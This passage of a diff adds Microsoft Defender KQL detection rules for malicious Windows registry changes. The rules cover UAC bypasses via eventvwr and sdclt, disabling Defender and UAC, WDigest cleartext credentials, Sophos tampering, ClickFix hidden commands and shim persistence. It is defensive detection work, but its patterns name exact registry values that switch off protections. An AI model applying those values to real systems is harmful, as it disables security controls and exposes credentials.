+| where (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\NalDrv\\ImagePath", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\PROCEXP152\\ImagePath")) and (not((RegistryValueData contains "\\WINDOWS\\system32\\Drivers\\PROCEXP152.SYS" and (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe" or InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql b/KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql
new file mode 100644
index 00000000..ebb6ec9e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql
@@ -0,0 +1,14 @@
+// Title: Suspicious Shell Open Command Registry Modification
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2026-01-24
+// Level: medium
+// Description: Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence.
+// Generally, modifications to the `*\shell\open\command` registry key can indicate an attempt to change the default action for opening files,
+// and various UAC bypass or persistence techniques involve modifying these keys to execute malicious scripts or binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1548.002, attack.t1546.001
+// False Positives:
+//   - Legitimate software installations or updates that modify the shell open command registry keys to these locations.
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "\\$Recycle.Bin\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Contacts\\" or RegistryValueData contains "\\Music\\" or RegistryValueData contains "\\PerfLogs\\" or RegistryValueData contains "\\Photos\\" or RegistryValueData contains "\\Pictures\\" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Videos\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%AppData%" or RegistryValueData contains "%LocalAppData%" or RegistryValueData contains "%Temp%" or RegistryValueData contains "%tmp%") and RegistryKey endswith "\\shell\\open\\command*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_shim_database_patching_activity.kql b/KQL/rules/windows/registry/registry_set/suspicious_shim_database_patching_activity.kql
new file mode 100644
index 00000000..e5929ec1
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_shim_database_patching_activity.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Shim Database Patching Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-01
+// Level: high
+// Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom*" and (RegistryKey endswith "\\csrss.exe" or RegistryKey endswith "\\dllhost.exe" or RegistryKey endswith "\\explorer.exe" or RegistryKey endswith "\\RuntimeBroker.exe" or RegistryKey endswith "\\services.exe" or RegistryKey endswith "\\sihost.exe" or RegistryKey endswith "\\svchost.exe" or RegistryKey endswith "\\taskhostw.exe" or RegistryKey endswith "\\winlogon.exe" or RegistryKey endswith "\\WmiPrvSe.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_runmru_registry_path_clickfix.kql b/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_runmru_registry_path_clickfix.kql
new file mode 100644
index 00000000..bcf322f4
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_runmru_registry_path_clickfix.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Space Characters in RunMRU Registry Path - ClickFix
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-04
+// Level: high
+// Description: Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "#" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*") and (RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            ")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql b/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql
new file mode 100644
index 00000000..0800c15e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Space Characters in TypedPaths Registry Path - FileFix
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-04
+// Level: high
+// Description: Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "#" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and (RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            ")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/sysmon_driver_altitude_change.kql b/KQL/rules/windows/registry/registry_set/sysmon_driver_altitude_change.kql
new file mode 100644
index 00000000..c645dd67
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/sysmon_driver_altitude_change.kql
@@ -0,0 +1,13 @@
+// Title: Sysmon Driver Altitude Change
+// Author: B.Talebi
+// Date: 2022-07-28
+// Level: high
+// Description: Detects changes in Sysmon driver altitude value.
+// If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate driver altitude change to hide sysmon
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Services*" and RegistryKey endswith "\\Instances\\Sysmon Instance\\Altitude"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/system_scripts_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/system_scripts_autorun_keys_modification.kql
new file mode 100644
index 00000000..cf332362
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/system_scripts_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: System Scripts Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+//   - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts" and (RegistryKey contains "\\Startup" or RegistryKey contains "\\Shutdown" or RegistryKey contains "\\Logon" or RegistryKey contains "\\Logoff") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/tamper_with_sophos_av_registry_keys.kql b/KQL/rules/windows/registry/registry_set/tamper_with_sophos_av_registry_keys.kql
new file mode 100644
index 00000000..86bf9496
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/tamper_with_sophos_av_registry_keys.kql
@@ -0,0 +1,12 @@
+// Title: Tamper With Sophos AV Registry Keys
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-02
+// Level: high
+// Description: Detects tamper attempts to sophos av functionality via registry key modification
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SAVEnabled" or RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SEDEnabled" or RegistryKey contains "\\Sophos\\SAVService\\TamperProtection\\Enabled")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/trust_access_disable_for_vbapplications.kql b/KQL/rules/windows/registry/registry_set/trust_access_disable_for_vbapplications.kql
new file mode 100644
index 00000000..07f21acf
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/trust_access_disable_for_vbapplications.kql
@@ -0,0 +1,12 @@
+// Title: Trust Access Disable For VBApplications
+// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-05-22
+// Level: high
+// Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\AccessVBOM"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/uac_bypass_abusing_winsat_path_parsing_registry.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_abusing_winsat_path_parsing_registry.kql
new file mode 100644
index 00000000..a6fca729
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/uac_bypass_abusing_winsat_path_parsing_registry.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Abusing Winsat Path Parsing - Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains "\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/uac_bypass_using_windows_media_player_registry.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_using_windows_media_player_registry.kql
new file mode 100644
index 00000000..a46ce362
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/uac_bypass_using_windows_media_player_registry.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Windows Media Player - Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-23
+// Level: high
+// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/uac_bypass_via_event_viewer.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_via_event_viewer.kql
new file mode 100644
index 00000000..89695cef
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/uac_bypass_via_event_viewer.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass via Event Viewer
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-19
+// Level: high
+// Description: Detects UAC bypass method using Windows event viewer
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\mscfile\\shell\\open\\command"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/uac_bypass_via_sdclt.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_via_sdclt.kql
new file mode 100644
index 00000000..eea2b462
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/uac_bypass_via_sdclt.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass via Sdclt
+// Author: Omer Yampel, Christian Burkard (Nextron Systems)
+// Date: 2017-03-17
+// Level: high
+// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001
+
+DeviceRegistryEvents
+| where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/uac_disabled.kql b/KQL/rules/windows/registry/registry_set/uac_disabled.kql
new file mode 100644
index 00000000..170acc2d
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/uac_disabled.kql
@@ -0,0 +1,10 @@
+// Title: UAC Disabled
+// Author: frack113
+// Date: 2022-01-05
+// Level: medium
+// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/uac_notification_disabled.kql b/KQL/rules/windows/registry/registry_set/uac_notification_disabled.kql
new file mode 100644
index 00000000..6a4f12e4
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/uac_notification_disabled.kql
@@ -0,0 +1,12 @@
+// Title: UAC Notification Disabled
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-05-10
+// Level: medium
+// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
+// UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
+// When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/uac_secure_desktop_prompt_disabled.kql b/KQL/rules/windows/registry/registry_set/uac_secure_desktop_prompt_disabled.kql
new file mode 100644
index 00000000..5c2b5725
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/uac_secure_desktop_prompt_disabled.kql
@@ -0,0 +1,12 @@
+// Title: UAC Secure Desktop Prompt Disabled
+// Author: frack113
+// Date: 2024-05-10
+// Level: medium
+// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
+// The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
+// When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/windows/registry/registry_set/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql
new file mode 100644
index 00000000..689ef8d5
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/uncommon_extension_in_keyboard_layout_ime_file_registry_value.kql
@@ -0,0 +1,14 @@
+// Title: Uncommon Extension In Keyboard Layout IME File Registry Value
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-11-21
+// Level: high
+// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
+// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
+// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Control\\Keyboard Layouts*" and RegistryKey contains "Ime File") and (not(RegistryValueData endswith ".ime"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/uncommon_microsoft_office_trusted_location_added.kql b/KQL/rules/windows/registry/registry_set/uncommon_microsoft_office_trusted_location_added.kql
new file mode 100644
index 00000000..5e7459d2
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/uncommon_microsoft_office_trusted_location_added.kql
@@ -0,0 +1,12 @@
+// Title: Uncommon Microsoft Office Trusted Location Added
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-21
+// Level: high
+// Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Other unknown legitimate or custom paths need to be filtered to avoid false positives
+
+DeviceRegistryEvents
+| where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) and (not((RegistryValueData contains "%APPDATA%\\Microsoft\\Templates" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Templates" or RegistryValueData contains "%APPDATA%\\Microsoft\\Word\\Startup" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Word\\Startup" or RegistryValueData contains ":\\Program Files (x86)\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office (x86)\\Templates" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\Templates\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/usage_of_renamed_sysinternals_tools_registryset.kql b/KQL/rules/windows/registry/registry_set/usage_of_renamed_sysinternals_tools_registryset.kql
new file mode 100644
index 00000000..978606fc
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/usage_of_renamed_sysinternals_tools_registryset.kql
@@ -0,0 +1,12 @@
+// Title: Usage of Renamed Sysinternals Tools - RegistrySet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-24
+// Level: high
+// Description: Detects non-sysinternals tools setting the "accepteula" key which normally is set on sysinternals tool execution
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+//   - Unlikely
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\PsExec" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\Active Directory Explorer") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe"))) and (not(isnull(InitiatingProcessFolderPath)))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/vbscript_payload_stored_in_registry.kql b/KQL/rules/windows/registry/registry_set/vbscript_payload_stored_in_registry.kql
new file mode 100644
index 00000000..96af8950
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/vbscript_payload_stored_in_registry.kql
@@ -0,0 +1,10 @@
+// Title: VBScript Payload Stored in Registry
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-03-05
+// Level: high
+// Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains "vbscript:" or RegistryValueData contains "jscript:" or RegistryValueData contains "mshtml," or RegistryValueData contains "RunHTMLApplication" or RegistryValueData contains "Execute(" or RegistryValueData contains "CreateObject" or RegistryValueData contains "window.close") and RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion") and (not((RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ((RegistryValueData contains "\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" or RegistryValueData contains "<\\Microsoft.mshtml,fileVersion=" or RegistryValueData contains "_mshtml_dll_" or RegistryValueData contains "<\\Microsoft.mshtml,culture=") and InitiatingProcessFolderPath endswith "\\msiexec.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData*"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/wdigest_enable_uselogoncredential.kql b/KQL/rules/windows/registry/registry_set/wdigest_enable_uselogoncredential.kql
new file mode 100644
index 00000000..50528dd1
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/wdigest_enable_uselogoncredential.kql
@@ -0,0 +1,10 @@
+// Title: Wdigest Enable UseLogonCredential
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2019-09-12
+// Level: high
+// Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "WDigest\\UseLogonCredential"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/wfp_filter_added_via_registry.kql b/KQL/rules/windows/registry/registry_set/wfp_filter_added_via_registry.kql
new file mode 100644
index 00000000..c37cfb49
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/wfp_filter_added_via_registry.kql
@@ -0,0 +1,10 @@
+// Title: WFP Filter Added via Registry
+// Author: Frack113
+// Date: 2025-10-23
+// Level: medium
+// Description: Detects registry modifications that add Windows Filtering Platform (WFP) filters, which may be used to block security tools and EDR agents from reporting events.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1562, attack.t1569.002
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\BFE\\Parameters\\Policy\\Persistent\\Filter*" and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\SysWOW64\\svchost.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/windows_defender_exclusions_added_registry.kql b/KQL/rules/windows/registry/registry_set/windows_defender_exclusions_added_registry.kql
new file mode 100644
index 00000000..c611b785
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/windows_defender_exclusions_added_registry.kql
@@ -0,0 +1,12 @@
+// Title: Windows Defender Exclusions Added - Registry
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-07-06
+// Level: medium
+// Description: Detects the Setting of Windows Defender Exclusions
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Administrator actions
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\Microsoft\\Windows Defender\\Exclusions"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/windows_defender_service_disabled_registry.kql b/KQL/rules/windows/registry/registry_set/windows_defender_service_disabled_registry.kql
new file mode 100644
index 00000000..bb34d560
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/windows_defender_service_disabled_registry.kql
@@ -0,0 +1,12 @@
+// Title: Windows Defender Service Disabled - Registry
+// Author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali
+// Date: 2022-08-01
+// Level: high
+// Description: Detects when an attacker or tool disables the  Windows Defender service (WinDefend) via the registry
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Administrator actions
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000004)" and RegistryKey endswith "\\Services\\WinDefend\\Start"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/windows_event_log_access_tampering_via_registry.kql b/KQL/rules/windows/registry/registry_set/windows_event_log_access_tampering_via_registry.kql
new file mode 100644
index 00000000..51ce5ddf
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/windows_event_log_access_tampering_via_registry.kql
@@ -0,0 +1,12 @@
+// Title: Windows Event Log Access Tampering Via Registry
+// Author: X__Junior
+// Date: 2025-01-16
+// Level: high
+// Description: Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1547.001, attack.t1112
+// False Positives:
+//   - Administrative activity, still unlikely
+
+DeviceRegistryEvents
+| where ((RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Services\\EventLog*" and RegistryKey endswith "\\CustomSD") or ((RegistryKey endswith "\\Policies\\Microsoft\\Windows\\EventLog*" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels") and RegistryKey endswith "\\ChannelAccess")) and (RegistryValueData contains "D:(D;" or (RegistryValueData contains "D:(" and RegistryValueData contains ")(D;")) and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/windows_recall_feature_enabled_registry.kql b/KQL/rules/windows/registry/registry_set/windows_recall_feature_enabled_registry.kql
new file mode 100644
index 00000000..89c77c5d
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/windows_recall_feature_enabled_registry.kql
@@ -0,0 +1,14 @@
+// Title: Windows Recall Feature Enabled - Registry
+// Author: Sajid Nawaz Khan
+// Date: 2024-06-02
+// Level: medium
+// Description: Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0".
+// Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
+// This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
